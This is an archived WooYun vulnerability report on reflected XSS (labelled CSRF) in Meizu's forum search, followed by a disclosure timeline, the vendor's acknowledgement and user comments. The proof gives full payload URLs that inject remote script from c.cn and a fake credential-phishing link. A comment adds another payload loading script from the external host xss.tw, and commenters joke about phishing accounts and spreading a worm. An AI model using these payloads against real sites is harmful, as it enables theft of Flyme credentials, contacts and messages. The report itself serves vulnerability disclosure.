当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016117

漏洞标题:魅族论坛存在CSRF漏洞

相关厂商:魅族科技

漏洞作者: Clar

提交时间:2012-12-17 00:48

修复时间:2013-01-31 00:49

公开时间:2013-01-31 00:49

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-12-17: 细节已通知厂商并且等待厂商处理中
2012-12-18: 厂商已经确认,细节仅向厂商公开
2012-12-28: 细节向核心白帽子及相关领域专家公开
2013-01-07: 细节向普通白帽子公开
2013-01-17: 细节向实习白帽子公开
2013-01-31: 细节向公众公开

简要描述:

魅族论坛存在CSRF漏洞,如操作适当可取得用户的flyme帐号密码,通过flyme帐号密码可查看通讯录短信帐户余额等信息。

详细说明:

背景:魅族的手机本身有flyme远程账户,用于存储通讯录、短信等私密信息。
核心:论坛改版后可使用flyme帐号密码登录论坛.
自评:个人给予漏洞等级:高。原因在于用户的通讯录以及私密短信泄漏,并且可操作flyme帐户金额、远程锁定手机等功能。
还有很多操作可以执行例如修改CSS样式等操作。不一一列举了。

漏洞证明:

背景:魅族的手机本身有flyme远程账户,用于存储通讯录、短信等私密信息。
核心:论坛改版后可使用flyme帐号密码登录论坛.
自评:个人给予漏洞等级:高。原因在于用户的通讯录以及私密短信泄漏,并且可操作flyme帐户金额、远程锁定手机等功能。
注意:下方提供的连接中使用的c.cn仅为本机host域名 重现请自己修改JS调用域名等信息
图一为IE下的远程JS调用,可直接操控页面

1.jpg


连接:http://bbs.meizu.cn/search.php?srchtxt=%22;%3C/script%3E%3CSCRIPT/XSS%20SRC=http://c.cn/1.js%3E%3C/SCRIPT%3E&srcreply=0&srchtype=title&orderby=dateline&ascdesc=desc&searchsubmit=1&searchtype=search_subject
图二为chrome或其他浏览器实现帐号密码欺骗

2.jpg


连接:http://bbs.meizu.cn/search.php?srchtxt=%3C/script%3E%3Ca%20href=http://c.cn%3E%3Cimg%20src=http://c.cn/1.png%3E%3C/a%3E%3C!--&srcreply=0&srchtype=title&orderby=dateline&ascdesc=desc&searchsubmit=1&searchtype=search_subject
还有很多操作可以执行例如修改CSS样式等操作。不一一列举了。
@xsser 说要补充证明,于是就有了下面的图片:

1.jpg


2.jpg


3.jpg


11.jpg


修复方案:

CSRF我相信魅族能修复的。

版权声明:转载请注明来源 Clar@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2012-12-18 16:04

厂商回复:

该漏洞我方正在紧急处理,谢谢关注!

最新状态:

暂无

漏洞评价:

评论

  1. 2012-12-17 10:14 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    ....我的账户。。。。

  2. 2012-12-17 10:19 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @疯子 我也是煤油。。。。

  3. 2012-12-17 11:24 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Clar 所以说啊,别瞎搞,我昨天还用魅族盲打了一个腾讯的应用。

  4. 2012-12-17 11:29 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    话说魅族对漏洞处理的反应太慢 态度也不是很好 貌似没专人去处理漏洞的问题 给魅族报过两个漏洞 修复了一个 处理反馈的都不是很及时 貌似对漏洞的危害上认知不够 flyme云端可是涉及到用户通讯录、短信等隐私的啊!!! 还有flyme账号与论坛账号统一了 这也是一个很大的安全隐患

  5. 2012-12-17 11:33 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    我也是一魅族用户,所以希望魅族能做好用户数据不泄露的安全工作 尤其是对待用户数据安全的态度上 至于用户数据不丢失 貌似是手机云服务最基本的 这个就不用说了吧

  6. 2012-12-17 12:06 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    @Finger 就是考虑到这个问题才不敢用的原因,我觉得魅族的安全做的肯定不如苹果,被脱库的概率很大,一旦被脱库,My God,损失大了。。

  7. 2012-12-17 12:39 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @cnrstar 那就不用云服务

  8. 2012-12-17 13:08 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @疯子 汗 我没瞎搞呀,我这不是提交给乌云了嘛。。。

  9. 2012-12-17 13:10 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @Finger 要是魅族不重视的话 到时候 我就去论坛发帖,钓到一大把账号密码来,然后拿到通讯录。将名称什么的 都屏蔽掉再晒在论坛里去。我敢肯定没有会非常生气的。

  10. 2012-12-17 13:15 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @Clar 马上给你删帖!

  11. 2012-12-17 13:36 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Finger 是的..确实,他们不是很注重安全,也不理解白帽子的心情。

  12. 2012-12-17 14:02 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @Finger 汗 手机论坛这么多。。。 我想MZ不会做的太傻的。

  13. 2012-12-17 15:40 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Clar 你去看看魅族的开发者社区会有惊喜。。

  14. 2012-12-17 16:41 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @疯子 没看到惊喜呀!你确定是开发者社区?

  15. 2012-12-17 22:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Finger 鄙视不分享漏洞详情

  16. 2012-12-17 22:30 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @xsser 看站内信?

  17. 2012-12-19 13:34 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    第二天回复,还算不错,毕竟魅族原先是手机厂商,从flyme才开始进入互联网,不能求全责备

  18. 2012-12-28 16:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @凤凰 嗯,更关注就好

  19. 2013-01-31 09:11 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    这个应该是xss啊 img和iframe都是引用标签导致站外内容,都是因为过滤不严

  20. 2013-01-31 14:06 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @小胖胖要减肥 他们根本不在意这样的漏洞,比如说2013年前站内信的他们都不去理会:http://developer.meizu.com/faq/faq_toquiz.jsp?keyWord=/'%3E%3C/script%3E%3Ca%20href=http://www.baidu.com%3E%3Cimg%20src=http://store.meizu.com/images/booking_new.png%3E%3C/a%3E%3Csvg%3E%3Cscript%20xlink:href=//xss.tw/1114%3E%3C/script%3E%3C!--

  21. 2013-01-31 14:08 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @Clar 蠕虫蠕起来吧 骚年

  22. 2013-01-31 14:13 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @小胖胖要减肥 .....等有机会了 我会这么干的 (O.O)

  23. 2013-01-31 14:15 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Clar 后面有个漏洞直接把人家的手机信息给窃取了

  24. 2013-01-31 14:16 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @xsser 你说的是那个订单的那个吗?

  25. 2013-01-31 14:18 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @小胖胖要减肥 @xsser 话说小米也有偷COOKIE的CSRF漏洞 -_-!!! 毕竟他是PHPCMS的系统

  26. 2013-01-31 14:19 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Clar 订单那个还没人发 你来吧

  27. 2013-01-31 14:21 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @xsser -_-!! 我以为你说的是那个乌云那谁发的扫手机号码订单的

  28. 2013-01-31 14:30 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @Clar 多多发洞 安全环境才能越来越好